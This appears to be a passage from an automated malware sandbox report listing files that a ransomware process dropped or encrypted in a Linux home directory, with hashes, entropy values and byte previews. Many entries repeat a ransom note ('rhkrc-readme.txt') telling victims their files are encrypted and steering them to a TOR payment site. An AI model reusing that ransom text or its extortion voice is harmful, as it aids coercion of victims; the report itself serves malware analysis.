                  Preview: .`j.....1U.....V.0...B.. .5"....T.....R..$i}.)P....@.c..R.s,.G...Xa,........I..^..o....$....h2.N.(8.jW...o....V._.2z..`\..%...$...$W.}..#..Z...K.J......o..U-:0@).4..n..v...x>h..#...X.Q2*K..'A.a....X..D.v.S.zM4.$.r.............D...87.....{=....@8WH.....}....S....!Iv.7O..8..z..r..T.J.}....q...G...s.`~../.u.+?&...Y.......s6B.......q......,P......W.f....&.E.....MY.....j....LS..d.....CoO7/....R.X...%.."3......43...a...}(..fdh7.`KY...}.L.2...i..j....b..w....C.X.....F.a...* ......s.N....O.......Gn.....M.?.a......c.Q.....7F.,.*4^.r.?....?..U.n...+.a.....g....cE.T.......FuI..]:.dYg).....1:?.g.6.s....a....2~..X.cA.....Q.^....6.v@c...@. .Z.X...c.c...Lp....0Q..z.d....m..R4.......'.T.-+g..R...Xb..aL.p..^.}..p5.=.T..k..~R..&.....P..h.+.%..4lFV....Y.k..Ou.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................Y..];..:....].....d..?.8..<.\{.X...8*..8..............
                  /home/user/.config/xfce4/xfconf/xfce-perchannel-xml/keyboards.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):436
                  Entropy (8bit):6.505231246401422
                  Encrypted:false
                  SSDEEP:6:ep8WH9meM2YRnUtTkGxCMuOO+WxGQpCOapcuEjIwtJiMUg+1zmhOO/EUyp6XcbVC:eppF38nsHkyfEltJer2DcUBwBY3
                  MD5:375B00E19974278285A939C25E5E1F6B
                  SHA1:51579DAA99AE63523B69FD44F48C40C8AB31FB47
                  SHA-256:37564A0A6E9DC5A73F982274BC2CFF288AEAAAD424778B55833C5B850AEBC0E9
                  SHA-512:694BBA4075281F14AE5E359CB55E968F2AA995886D822148070782D6D351A06C53A77C387B94B5035A8A309AE56E05194B126591161E4DDFD1A9672DE20663F5
                  Malicious:false
                  Reputation:low
                  Preview: q.?..L.I........"\......~#..4-.)....{8S8..KT...X...............Jr......j..a0vP.T...{....ws.\,3...........{-Z=l.<R..Op...$.B.$q.....M..{+EZ_.....O.3.VO........m&....j].....Q...!...n...I.r]....F.&...4.l0...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp............................................................................................e..O.v...`gu]...1LH.-......;U.......Z.$.........N/^.
                  /home/user/.config/xfce4/xfconf/xfce-perchannel-xml/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/xfce4/xfconf/xfce-perchannel-xml/thunar.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):500
                  Entropy (8bit):6.751552504636466
                  Encrypted:false
                  SSDEEP:12:Zk6jAuj44nL1I8uwrE2kMJmKbv8jS2DcUBQzGtNE:ZoC4q/PA27mGEjS2Dfm8E
                  MD5:25BE4AEF4CFBC5E3AE25D9AA9192D27E
                  SHA1:DD11AC3AAF02D0B017FCC430A5F7775E55968574
                  SHA-256:A1FC074517A8410105C2DEBA04E796D836974AB1CA62A0374881F71BBF8D7AD3
                  SHA-512:EA0C925A7C50C85B63383265703DBBD287673F79EA5F39EB70D71CF6D52BE925AA089F1A71F48AF057F45A8091D190993BA75B09A4FE4149CFF803D10FEC6722
                  Malicious:false
                  Reputation:low
                  Preview: .A..8,..Z........<O..j..3..B..G.gKcY[........S.j..7N.".%.ym.'.....7..A.(.H.2h.../.........2..P.....(.O~{.R...Y..m.$.5....;....A...d@..z.t.......`c...c@L...2D@.........J.u.i......v.h1.C...~.....]sTI..[q#.....e....^..}Q.QS......X.p...<.U..c...l...;..Du.;R..8._...W.@..e.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................NE1.rGv.V.....nn.*;.9...._g..........E.8>............}.
                  /home/user/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-desktop.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1648
                  Entropy (8bit):7.7312594204475635
                  Encrypted:false
                  SSDEEP:48:Vjde3o8LZ0xf8bcf3paSfHcJ4myuOf3lD3V:3yTYtfZaSf8J4nuKVD3V
                  MD5:BCD0FB35CB382E65C834D8997BC49F7A
                  SHA1:09D8832DB6667063D3EE21CB67142E83259FF3D6
                  SHA-256:EC7600B1A5E003DC670A49559DDB776D969AB681AAB595F0FE42CED2A82CC58E
                  SHA-512:C2FB0C0416BA61D404E08C89BEBC50426B5793D7781F932A9E839D40F1DF256F16ABB12E1468EEB14738D66AFB670EC5FFA095FB0EA8B1C517379F30889598C5
                  Malicious:false
                  Reputation:low
                  Preview: .=d#|..\C....FL.B.......#+..}..Id....>...[.K...r..+!Y..;*..eT)`..`..e....l......U2.....a..=....G.R.....47...OA.....n...sz.9Q..8....mZCI....P...$....?..8,.5.....m.n\.(!p...`.L.........................Mm\g...#l...e.io.......w.U........'.T.......%T.^......r..M......bG.{:.....K`.x.JU.).B......O...#...n.V....'...A?.JWm......<...pZ.5..c(3....q.h.k&.....~....gM...9...G...#.....l.Zg..i.tS.XW.....^7......KX4........u.X......i.MH..p.9..KyOf...2>...Q[;.L...78.5......9.|U......s..+b./...R.&.x^0BL.....@..7.g.WP.?.... .......#.:.....@..C.RS..H.:..B.^.".V..+.+_.\.jH:..9>...!u.).......).1.'`V{..Xlv..W........5..W........8....a.<:<..k.....(F.M.C.@.Bg.......9b.,p..!9...`.+.s...n.. ...YJ.,..0.....q.r.V.....N...._.G.d.;.i..mZ....E[}...n;t.A.8..Y..._.^..TD,........u....~.}..x..%..Q......T..b...#..cDC..d..n:j.u*.m@.lA..U.*...]<z.SOc.F6..B5].).;..;..[.T.....b.i.ri~..+....w\.....l.%........C.!.j.XG......m...s...G..m.h.!Z!..AD^*)H..V<z.\....q.@(E;..V..K..$..8....G.x...........) ....$...,4.C"x.dxzZ.....E.m.e...
                  /home/user/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):13031
                  Entropy (8bit):7.980611108403688
                  Encrypted:false
                  SSDEEP:384:IAHU8qIKYxEbbniiM4IwEKDZkbciEL+tXkn:HNqIKYSHiiEwEKDebcdLyXkn
                  MD5:024C5498A59999700322923393B8CE3B
                  SHA1:7AF3CEC1F6E14AF818227334F96AC5DAE267F901
                  SHA-256:33EF23468261C6DC991D9697DDE7091195AD151E1D4B32F4EF2822D9F62737F2
                  SHA-512:7BE83DA0726C28A4A15B1911599F4A138C2593E8CB7F513C9826653861FE499A3F048C764A8BD21AA6B4BD9AAE84EEC242EF1DB0BADC6331730D788D66850B91
                  Malicious:false
                  Reputation:low
                  Preview: ...+J.....$>El.@h0%(0....I...g........}Q\ny..^W.......t............\.3.Q..cP..q,...r......&....O..l...u.C. ..Yuxe.9...`~..U..M..&...G.Yx......e.a..>....}...f.Q..w.g_..<n.A{;@]D...........Ai7)_..w$......?...k(.. ........T\Tc-.8O9Jy.RBX ....d....:..lj..G0...0.\~.!...K|.9..8.l....T_....YrzP..t:...h........L......."..o...+....w,dK4|k.`... ~....z..y.v..#c.(.i....'.I....#m.....D+Ru....(.....6.........r.vG.g?..I....yJ.s/.^.../.L....!..n..$c^;@....o.X......v...j...6.....a...X7.......y........%.....d..0"....X(...b....D..p.e.iO~>..\..q.yn1.L5$.#..i.....g...W..%j.f.O..wO+.puXW...q....=/k....S.].....O._.d-.........).v.T.&....]._..F.9..6.........Ri .[.PR....L(.!.:.I.......+:.....E....k.T...N].E0.w..^...~..j.+....7X-...zk....O......E.yS....l..UB..~..^.......'*Z....._.*..,P..j....x..Wv.......M% VVR.....4....h...f...X.?u.#..h2........'".[D+...K7P.7..4.a.Ro.+..Y...d..;r...i.<...c....F...q..~..j.;.....{...B....!.N............y..Q.F..6.5....LH!...Y.[....V#.vX...1.D.mI#...../,{vp...........M......?S..6...
                  /home/user/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-panel.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):2736
                  Entropy (8bit):7.848289125524241
                  Encrypted:false
                  SSDEEP:48:maLhQR6MbU75OLSElAOgy0rj0kK3eydENV11nzOLIvM0nJsoVui55N3VEBexsDTU:ma1MbU6S+Atn0b3eydENFUoMLoIQtep8
                  MD5:5C50AE6FBA2E7145200CB757ABCE5621
                  SHA1:69D7796540638DCCCD5854BECAFCCA23598EA90F
                  SHA-256:C8D16568BFFF6E93F1702FA3B484E7CBDC76BA7ABF0A715DB45139877E42D5F1
                  SHA-512:7A55B8850F04B5F6865046A38099E6A39F74C2DAF2060B36C9C3EF36BCA5C85B998ED453A77693D72BFEA41A3585CAF14D62A748854246B5E54F0896155A177F
                  Malicious:false
                  Reputation:low
                  Preview: ..e...U..B.b.\..r.^......;...ye..KA.4H..q.K..%P(S.9|..6~t.\T.MW...a..3...q...c75);..-|....(..-....C..4./.].9.F...>..4(C......MOK}ERI.2.fO...vh..vQ'..d...,.....o....B. '.{]..J9..{.%..t.lh........g.b.......6...;/...o..........OC"..F..L..._..Q..]P `It.)..gb.'G(R.R...$#.(....bX.c....j....../....._.J.a.]/......dk.J.._.....j.dp.@X.H.e3....6..4..k5....O..W.M............j..pa".e.e....`&..L5;.J....qk=..F.....R...B..mW?A..0.RLZ...>n.....h..R_..J.........$a.<....x...-C!...g.h..Z.X.h.M..*.Q)2+;N..S.......Xx.aA..PcX..$.;......l....O.R.......1...s .....]......T.}k.!9.Z...BIr..h.1....w.<....&..i...pE....%.....-........j..'......\HK......_''......{.`V`'.dO..X....mCn...w87U.....t.........LF..:..B...g.....+"..b4.1u7..[.3....^.p......s..F..R....W...U!.H...|%..^/;...S%.\j.8..kM#.pj.C..N..2.:"......<.`.yBp.+q$C...R\....'/}c.i\.*....>...4?.....F.p?.........I..;].c2....^.^..T.?.y..K......"2....l.W5Gc;..5..bb..B..5?~1...C...h.......IFI)=.0r` ............V.$.J...y}e..AW"....-....Kr.....[2t?..3.Y8.......p..0.O%
                  /home/user/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-session.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1773
                  Entropy (8bit):7.7389312871932345
                  Encrypted:false
                  SSDEEP:48:ewLMZJPnmAccqwauERDyXac1BNiRpVjEIT2GbCYDV:TLMZBmTcqwmIZ1BK9EIT9DV
                  MD5:8C5B80D407B2745D54CC8F76942BF288
                  SHA1:2F762B1391FAB3CB65D284BDF61680DBFE7632F4
                  SHA-256:55FA54249662BE14DBF0D9226716AD29D04D1DD5DB6CEF32C5FC78B9E2EAD6B1
                  SHA-512:112C6392CA91A9CFFC883179A11CCF68BBBA39E5B7A23A6EE4530937B22207BB7700340439ADFCCBDCE911BC0A2226F7F6CD89789C2FF358DBE062FB135F17B9
                  Malicious:false
                  Reputation:low
                  Preview: ,......d...^...[...:jH.P....U...d..L.....r.hS..Rvrj.2...A...ufF=p6C..:.......U..... ....|......WO........g.9(..ueF..s.?........{.!..PF.....f+Hu.....H]T....+.[....._a.\"..*..&..y..%.{.....c.>q.N..,.=1Ms.....Q...#l.y4K76xOR.]^.Q....RE.UxA..l..=..5.W0......_l".7'.~t..V..."=Up..]eD..E......,#....9.5...F.cd.P.si..k.21.}.[>..|..M....?T{{'.H..>.R.H......_....A).....n.n........x.....D.{...p.\?.t........,.qEf..6,.[..J...B.........wgL.....(.]{... ..>z(......D...2...%...CO...|B...|.FF....K@...k..?6.x6.....s.,...'.!.+.J..&JL.....*.Y.P-F..........?.a9....S.M[..G}..pwwW..]..w]..]...UF..........%.;..?L...?...`.1tTn.\A......,n.J!._......^OD.$~.q.".1.._..(.vY.g..ZEO....9...t.".U..<..M...{.>....<..f.u.6@..&E..9.w..,...0......~....z.q...:l..*..Q?.\...e...7......h...T.......:f....U.u8..e <P.f..aa.t...+^....:.{.....n..YJA.7.S.....ma....O......=...sx...H..-I..h.Z5Q".tr.....(^5.1.I........#..mG.hx5x.Z.,Vc.#..........F.....1.......}|.M".{.]A.... .i..s..O.ho........W....R$C.yT.QS.b.,......`....G..a.../a.`.....
                  /home/user/.config/xfce4/xfconf/xfce-perchannel-xml/xfwm4.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):4642
                  Entropy (8bit):7.926392606325485
                  Encrypted:false
                  SSDEEP:96:6r3idNA3WiGgr57J34Rkb/8WAScpGmP+qNq0VDG:6LidNXIh4RotmPjNdVa
                  MD5:F3BBD9FDB312E038A3D6E1636179FF56
                  SHA1:7F491B12595ADEEBC019B1A2026841E2D8B4771A
                  SHA-256:4198EC22B0014AEECFE216B22279DF74BB9FEEF1E9903532CC421959A3404150
                  SHA-512:7660EC67E4DB2D6BD00BDF4B3FB23E5FB098086238DBE005EB682085DC479B3E828FC764CE3465FA392CD61EE8B8B584D5A5BE42F79A96E310BCC6119FE2548B
                  Malicious:false
                  Reputation:low
                  Preview: ..D/..|..}@..)2Cl..O.V.......'..4>.7m...<..8uQL.<...|...>.#8d.#...J......5=.......O:P......-[E..<U/.]i.5M...g.z..+3....e..$..!.2j.S..*.....+...z......j...eA .j..O.(.h.wk.....BHBgN "....a?..aN....>-...v...k<.......P.#3TI).J....3.c...Fn..c....(.K.%..1Rz/...N...+.......[..........p'....uU..5s.d...Q......3>N..D...L$?.1.A...'.+.|.......?..1{."..V....$...........T]...4...3.}.5.u>...p.....r....p?.h[......?..l......dC...:.....=...+z+[:.2C.7R.XE....u|..._.-...H{.......g..'.c.1.:y..4.ZI...U............X....kdT....D^O..`.._..q..................._.Q..*.a....../.$*,....Ns.....2.g.Y6i.lS......x...-^....Bi.`..%........(....b6...?k.....f...?.>w.y)...U\*...W........j...|.R.V...YT......m...../x..f~Y.N.x ..qmiY.J..z.....4..3.@..,.o...00...h...;.<c.e..........k.C.....Zj.1..Y.........5....kZ..w+.n.........AM9v.^|.U...[..L"63l.....R.......0.2..C......hB...../...../c0W..m3..4...A_..>..r.u.Q.......bW."}..e...F..(t...pZ.p#e..g!5.2..}.+.a.......(..RK.....E. Q..........&....}.O....:.....i...#......>.mp..}..RbO..
                  /home/user/.config/xfce4/xfwm4/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.dbus/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.dbus/session-bus/f0b45546524a75b2e6e8e8a55aab94da-0
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):698
                  Entropy (8bit):7.200168848307193
                  Encrypted:false
                  SSDEEP:12:liNph30n+TAsOiEnmG0mYmEZ4IhJoVMrsYKO2DcUBwhJ3n:lShk+kiLvmpwBoY/2Df2
                  MD5:13D59441367C072C2FD91BBAE725096F
                  SHA1:D1E0F1A2C9C86D94CEDD5ECDA9399B43511E9261
                  SHA-256:59B93B0DA2E09ED0D06425A0EAE700E85EA5EF94A91E4DA26565B54C8DD59377
                  SHA-512:12B355291FE2F5D74E550645407D943FA5C69F4593AAB4D219D462F711D361C22049D5D7547009F2B794607F755B8B588B7FEA3537BA5948D8EDE9FC34420604
                  Malicious:false
                  Reputation:low
                  Preview: ..re.....9...t.F.-.6&a......'@....6..a....}...$,u6..9.<tD...........W....c.z..........R.Os...u....Cv.n...U..(....G...~.u.0I.I."#/....H..1V..W.....W1..*q.1.X^.?o.s.K..N.p.1......#..%4..xh^....%.._+{..lq.......}..L..+.................({wi.....u.....X.)..$..J.Y0.....l...o..>F..0..r..9..A.....;.....H*)*0...RC<.D...........).....?.}.U...&.'JC...5w.....b..om.....P.r....^2M5..#.}0..<..|.q.w8:,...6.tuj....u_..k&}Ui.5K.......~..%....?..........v............-{....D.......%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...............................................................................................3....D........6.![a/..ID..'..v_...F..............
                  /home/user/.dbus/session-bus/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.dmrc
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):258
                  Entropy (8bit):5.244053466353286
                  Encrypted:false
                  SSDEEP:6:3xKssanq7V1zmhOO/EUyp6XcCPvx535MXl/:wssT/2DcUBBRpm/
                  MD5:121EEFC8AF2F74787AA04901EE26F2BE
                  SHA1:11F595692CAC0795DA0CD7F1FF98795AF3E23989
                  SHA-256:7F96A44E204F60007487B210400015574524E10AA5088AEE24B4A4E417E029E0
                  SHA-512:1F12D31C7D3B1C9A82E3E265FA75D727C29D6A863FCD2593848665A548D7FECC2E086B30DEE92357030F10E9413FEF646F72D1891A098C76784887FC215D6617
                  Malicious:false
                  Reputation:low
                  Preview: .'.ao...]%..l...O.M...X*..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...........................................................................................O.;...:.i.D\n.C.EF ....Q..M.(..1qh..S.KY..........c..
                  /home/user/.gnupg/private-keys-v1.d/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.gnupg/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/addressbook/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/addressbook/system/contacts.db
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):24808
                  Entropy (8bit):7.989810765075899
                  Encrypted:false
                  SSDEEP:768:XUvwdfX7rabUKktvGknMdobqig2TVXdk9o/p:XUC/7rUxezgobq1sVuoR
                  MD5:AB3D079D0AA00196253E31B14549FABD
                  SHA1:BEA7369BBB86A0D17ECE776B345074A32CBD69DE
                  SHA-256:9C3CF6CC863E2FC47FE91DAA0FD41C41C5EAB97AF214E62D15BA5219FC4FD483
                  SHA-512:C9CA98321EE7B5057105847EB5600A70175A06495564E59B9FDA99C84E4603E0419D494D66141964045C728C771EF3A9023198267EA6DB4FCAD4468F7FD32A99
                  Malicious:false
                  Reputation:low
